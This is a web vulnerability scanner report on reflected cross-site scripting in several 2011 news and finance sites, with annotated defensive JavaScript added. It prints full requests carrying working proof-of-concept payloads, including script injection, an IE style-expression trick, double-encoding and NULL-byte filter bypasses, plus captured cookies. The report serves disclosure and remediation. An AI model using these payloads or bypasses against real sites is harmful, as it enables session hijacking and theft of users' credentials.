Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.10.10.1304575105; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 01:30:40 GMT
Connection: close
Content-Length: 6018

       <div id="857597" class="grid third flush_top threeup_entries">
           <div id="entry_857597" class="entry no_border">
               <div class="image_wrapper"><a href="http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html?ir=World" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');">            <img src="http://i.huffpost.com/gen/273847/thumbs/r-BIN-LADEN-medium260.jpg" border="0" width="260" height="75" alt="" />        </a></div>
               <h5><a href="http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html?ir=World" class="threeup_titles block margin_0_20" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');">CNN Poll Finds That Most People Think Bin Laden Is In Hell</a></h5>
           </div>
       </div>        <div id="entry_threeup_central" class="grid third flush_top threeup_entries">
           <div id="entry_threeup_central_inner" class="entry no_border world">
               <div class="image_wrapper">                    <a href="/world/" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');"><img src="http://i.huffpost.com/gen/273918/thumbs/s-LIBYA-INTERNATIONAL-AID-97x75.jpg" border=0 width=97 height=75 style="display:inline" /></a>                    <a href="/world/" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');"><img src="http://i.huffpost.com/gen/273951/thumbs/s-OSAMA-BIN-LADEN-PHOTOS-97x75.jpg" border=0 width=97 height=75 style="display:inline" /></a>                    <a href="/world/" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');"><img src="http://i.huffpost.com/gen/273798/thumbs/s-AFGHANISTAN-PAKISTAN-BIN-LADEN-97x75.jpg" border=0 width=97 height=75 style="display:inline" /></a>                </div>
               <h5><a href="/world/" target="_top">More In World:</a> <a href="/world/" target="_top" class="threeup_titles" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');">                    Libya Targets Aid Arrival...                    Bin Laden Raid Photos...                    Pakistan Had To Know?...                    </a>
               </h5>
           </div>
       </div>        <div id="857624" clas
...[SNIP]...

2. Cross-site scripting (reflected)
There are 55 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences: input should be validated as strictly as possible on arrival, given the kind of content it is expected to contain (for example, a tracking identifier should be short and drawn from a small alphanumeric character set); and user input should be HTML-encoded at any point where it is copied into application responses, so that HTML metacharacters such as < > " ' and = are replaced with the corresponding entities. Where the data is copied into a JavaScript string, it must additionally be escaped for that context, because HTML entities are not interpreted inside a script block. In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
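The two layers above, applied to the two output contexts this report keeps finding (a double-quoted HTML attribute such as an og:url meta tag, and a double-quoted JavaScript string inside an analytics script). This is an added example written for this page, not code from the report or from any of the sites it lists; the host name www.example.com, the variable name pageUrl, the icid allow-list pattern and the vulnerable/safe renderers are assumptions for illustration. The sample payloads are the ones the report recorded.

```javascript
// Added example: context-aware output encoding plus arrival validation for
// reflected XSS. Not the code of any site in the report; the page shapes,
// host name and allow-list below are assumptions for illustration.

// Layer 2a: HTML attribute / text context. Every HTML metacharacter becomes
// an entity, so the value can never close the attribute or open a tag.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function encodeForHtmlAttribute(s) {
  return String(s).replace(/[&<>"']/g, c => HTML_ENTITIES[c]);
}

// Layer 2b: JavaScript string-literal context. Entities do not help here, so
// every non-alphanumeric UTF-16 unit becomes a \xHH or \uHHHH escape. This
// also neutralises "</script>", which would otherwise end the script block.
function encodeForJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, c => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// Layer 1: validate on arrival against what the field is supposed to hold.
// A tracking id is a short token (assumed pattern); anything else is rejected
// before it reaches any output.
const ICID_PATTERN = /^[A-Za-z0-9_-]{1,64}$/;
function validateIcid(value) {
  if (typeof value !== 'string' || !ICID_PATTERN.test(value)) {
    throw new Error('icid rejected by allow-list');
  }
  return value;
}

// Vulnerable renderers: the raw value is spliced in, which is what the
// responses in this report show.
function renderMetaVulnerable(icid) {
  return `<meta property="og:url" content="http://www.example.com/?icid=${icid}"/>`;
}
function renderScriptVarVulnerable(path) {
  return `var pageUrl="${path}";`;
}

// Hardened renderers: same templates, value encoded for the exact context.
function renderMetaSafe(icid) {
  return `<meta property="og:url" content="http://www.example.com/?icid=${encodeForHtmlAttribute(icid)}"/>`;
}
function renderScriptVarSafe(path) {
  return `var pageUrl="${encodeForJsString(path)}";`;
}

// Two checks a reviewer can run over a rendered fragment.
// The attribute is intact if the fragment still contains exactly one tag.
function attributeIntact(fragment) {
  return (fragment.match(/</g) || []).length === 1;
}
// The JS literal is intact if, placed between double quotes and evaluated,
// it yields the original text back instead of executing or failing to parse.
function jsLiteralRoundTrips(encoded, original) {
  try {
    return new Function(`return "${encoded}";`)() === original;
  } catch (e) {
    return false;
  }
}

// Constructed inputs: the payloads recorded in items 2.1, 2.3 and 2.5.
const ATTR_PAYLOAD = '89199"><script>alert(1)</script>cd5f8e88860';
const JS_PAYLOAD = 'goodnewsc033e";f7c25182fc9';
const SCRIPT_CLOSE_PAYLOAD = 'f3384</script><script>alert(1)</script>0ccc1ec0bf6';

console.log(attributeIntact(renderMetaVulnerable(ATTR_PAYLOAD)), attributeIntact(renderMetaSafe(ATTR_PAYLOAD)));
console.log(renderScriptVarVulnerable(JS_PAYLOAD));
console.log(renderScriptVarSafe(SCRIPT_CLOSE_PAYLOAD));
```

The order matters: validation rejects what the field should never contain, and encoding handles whatever is legitimately allowed through. Encoding alone is sufficient against the injections shown in this report, but only when the encoder matches the context the value lands in; an HTML-entity encoder applied to the s_265.prop12 assignment in item 2.1 would leave the quote intact.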


2.1. http://www.aolnews.com/category/goodnews/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.aolnews.com
Path:   /category/goodnews/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c033e"%3bf7c25182fc9 was submitted in the REST URL parameter 2. This input was echoed as c033e";f7c25182fc9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. In the response below the same input is backslash-escaped where it is copied into s_265.prop18 but not where it is copied into s_265.prop12, so escaping is being applied per field rather than at a single output point; the unescaped prop12 assignment is the one to examine.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /category/goodnewsc033e"%3bf7c25182fc9/ HTTP/1.1
Host: www.aolnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:20 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 11:56:20 GMT; path=/
Keep-Alive: timeout=5, max=999999
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 86979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
channel="us.news";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,aolnews.com";
s_265.mmxgo = true;
s_265.prop1="";
s_265.prop2="main";
s_265.prop12="http://www.aolnews.com/category/goodnewsc033e";f7c25182fc9/";
s_265.prop18="goodnewsc033e\";f7c25182fc9";
s_265.prop19="";
s_265.prop20="";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.2. http://www.bankrate.com/funnel/mortgages/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankrate.com
Path:   /funnel/mortgages/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7abf6"style%3d"x%3aexpression(alert(1))"ef43b8923ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7abf6"style="x:expression(alert(1))"ef43b8923ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /funnel/mortgages/?7abf6"style%3d"x%3aexpression(alert(1))"ef43b8923ec=1 HTTP/1.1
Host: www.bankrate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Servername: a-brmweb03
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 1.7.0
Content-Type: text/html; charset=utf-8
Expires: Thu, 05 May 2011 10:56:22 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 10:56:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 46805


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link type="text/css"
...[SNIP]...
<link rel="canonical" href="http://www.bankrate.com/funnel/mortgages/?7abf6"style="x:expression(alert(1))"ef43b8923ec=1" />
...[SNIP]...

2.3. http://www.citysbest.com/ [icid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /

Issue detail

The value of the icid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89199"><script>alert(1)</script>cd5f8e88860 was submitted in the icid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?icid=navbar_citysbest_main589199"><script>alert(1)</script>cd5f8e88860 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:46 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 01:58:46 GMT; path=/
Content-Type: text/html
Content-Length: 15674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/?icid=navbar_citysbest_main589199"><script>alert(1)</script>cd5f8e88860"/>
...[SNIP]...

2.4. http://www.citysbest.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f2e5"><script>alert(1)</script>6009f09c189 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?icid=navbar_citysbest_main5&9f2e5"><script>alert(1)</script>6009f09c189=1 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:05 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 01:59:05 GMT; path=/
Content-Type: text/html
Content-Length: 15691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/?icid=navbar_citysbest_main5&9f2e5"><script>alert(1)</script>6009f09c189=1"/>
...[SNIP]...

2.5. http://www.citysbest.com/traffic/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /traffic/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3384%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0ccc1ec0bf6 was submitted in the REST URL parameter 1. This input was echoed as f3384</script><script>alert(1)</script>0ccc1ec0bf6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /trafficf3384%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0ccc1ec0bf6/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2F%3Ficid%3Dnavbar_citysbest_main5%2F&cb=76544643 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575100835-New%7C1367647100835%3B%20s_nrgvo%3DNew%7C1367647100836%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:57 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 01:59:57 GMT; path=/
Content-Type: text/html
Content-Length: 17861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
5.pfxID="acg";
s_265.pageName=s_265.pfxID+" : "+pageName;
s_265.channel="us.citybest";
s_265.linkInternalFilters="javascript:,citysbest.com";

var isCity = "";
s_265.prop1= isCity !='' ? "trafficf3384</script><script>alert(1)</script>0ccc1ec0bf6" : "national";

var isUrl2 = "";
s_265.prop2= isUrl2 != ''? "" :"main";

s_265.prop12=document.URL.split('?')[0];
s_265.events="";
s_265.products="";
//s_265.purchaseID=Math.ceil(Math.random()
...[SNIP]...

2.6. http://www.citysbest.com/traffic/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /traffic/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0958"><script>alert(1)</script>e2e8451909c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trafficd0958"><script>alert(1)</script>e2e8451909c/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2F%3Ficid%3Dnavbar_citysbest_main5%2F&cb=76544643 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575100835-New%7C1367647100835%3B%20s_nrgvo%3DNew%7C1367647100836%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:35 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 01:59:36 GMT; path=/
Content-Type: text/html
Content-Length: 17532

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/trafficd0958"><script>alert(1)</script>e2e8451909c/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2F%3Ficid%3Dnavbar_citysbest_main5%2F&cb=76544643"/>
...[SNIP]...

2.7. http://www.dailyfinance.com/markets/mostactives [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.dailyfinance.com
Path:   /markets/mostactives

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7010'%3b71e04f33930 was submitted in the REST URL parameter 2. This input was echoed as b7010';71e04f33930 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Note that the response upper-cases the reflected value (MOSTACTIVESB7010';71E04F33930); JavaScript identifiers are case-sensitive, so a payload such as alert(1) would arrive as ALERT(1), and any working exploit has to be built from constructs that survive upper-casing.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/mostactivesb7010'%3b71e04f33930 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243_64_12_173_49=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; AOL_StockQuotesLiveUpdate=1; s_pers=%20s_getnr%3D1304575093082-New%7C1367647093082%3B%20s_nrgvo%3DNew%7C1367647093084%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.95b2; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.95b2;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:34 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: IPHONE_MESSAGE=2; Expires=Wed, 03-Aug-2011 10:56:34 GMT; Path=/
Set-Cookie: IPHONE_MESSAGE=2; Expires=Wed, 03-Aug-2011 10:56:34 GMT; Path=/
Content-Language: en
Content-Length: 68717
Keep-Alive: timeout=5, max=999
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Market Movers:</titl
...[SNIP]...
<!--
var relegenceTopics='MOSTACTIVESB7010';71E04F33930';
var RTN_SNIPPET_SIZE = '300';
var RTN_HOVER_TIMEOUT = '16000';
// -->
...[SNIP]...

2.8. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.everydayhealth.com
Path:   /allergy/climate-change-and-allergies.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc36d'%3bf5e1aa920da was submitted in the REST URL parameter 2. This input was echoed as fc36d';f5e1aa920da in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. The reflection occurs in a 404 response (see below); a browser parses and executes the body of an error page exactly as it would a 200 response, so the status code does not reduce the exposure.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /allergy/climate-change-and-allergies.aspxfc36d'%3bf5e1aa920da HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Connection: close
Date: Thu, 05 May 2011 10:56:35 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPBurMtkMjIxMTI2NS01ODVmLTQwMjYtOTNhZi1lZDQyOGE5ZWU2Y2E1; expires=Wed, 13-Jul-2011 21:36:35 GMT; path=/
Set-Cookie: ASP.NET_SessionId=dbvjd455jngipsngirkccraw; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16443


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<script> COMSCORE.beacon({ c1: 2, c2: '6035818', c3: '', c4: 'www.everydayhealth.com/allergy/climate-change-and-allergies.aspxfc36d';f5e1aa920da', c5: '', c6: '', c15: ''});</script>
...[SNIP]...

2.9. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /allergy/climate-change-and-allergies.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c6e76"><script>alert(1)</script>76c82397b8f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c6e76"><script>alert(1)</script>76c82397b8f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
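The two filter bypasses this report records, the double URL-encoding in item 2.5 and the leading NULL byte in items 2.9 and 2.11, share one root cause: the block-list runs over a different byte sequence than the one the application finally uses. This is an added example written for this page, not code from the report or from any of the sites it lists. The metacharacter block-list, the single-decode behaviour attributed to the web server, and the modelling of a native-code filter as "stops reading at the first NUL" are assumptions that stand in for the real WAF and application; the constructed inputs are the report's own payloads.

```javascript
// Added example: validation ordering versus canonicalisation. Not the code of
// any site in the report; the block-list and the filter models are assumptions.

// The kind of metacharacter block-list the sites appear to apply (assumption).
const BLOCKED = /[<>"']/;

// Decode exactly once, which is what the web server already does for the
// application before any handler sees the value.
function canonicalise(raw) {
  return decodeURIComponent(raw);
}

// Pattern behind item 2.5: validate the once-decoded value, then decode it a
// second time before use. The block-list sees "%3c", the page gets "<".
function validateThenDoubleDecode(raw) {
  const once = canonicalise(raw);
  if (BLOCKED.test(once)) return { allowed: false, value: null };
  const twice = decodeURIComponent(once); // the unnecessary second decode
  return { allowed: true, value: twice };
}

// Pattern behind items 2.9 and 2.11: a filter with C string semantics in
// front of a length-aware application. Modelled here by cutting the filter's
// view at the first NUL; the application keeps the whole string. This is a
// model of strstr/strchr behaviour, not a real WAF.
function nativeFilterThenApp(raw) {
  const decoded = canonicalise(raw);
  const filterView = decoded.split('\0')[0];
  if (BLOCKED.test(filterView)) return { allowed: false, value: null };
  return { allowed: true, value: decoded };
}

// Hardened ordering: canonicalise once, reject control bytes outright, then
// validate the whole string the application will actually use. Output
// encoding for the target context is still required on top of this.
function canonicaliseThenValidate(raw) {
  const decoded = canonicalise(raw);
  if (decoded.includes('\0') || BLOCKED.test(decoded)) {
    return { allowed: false, value: null };
  }
  return { allowed: true, value: decoded };
}

// Constructed inputs taken from the report: the double-encoded REST segment
// from item 2.5 and the %00-prefixed parameter name from item 2.9.
const DOUBLE_ENCODED = 'f3384%253c%252fscript%253e0ccc1ec0bf6';
const NUL_PREFIXED = '%00c6e76%22%3E%3Cscript%3Ealert(1)%3C/script%3E76c82397b8f';
const BENIGN = 'navbar_citysbest_main5';

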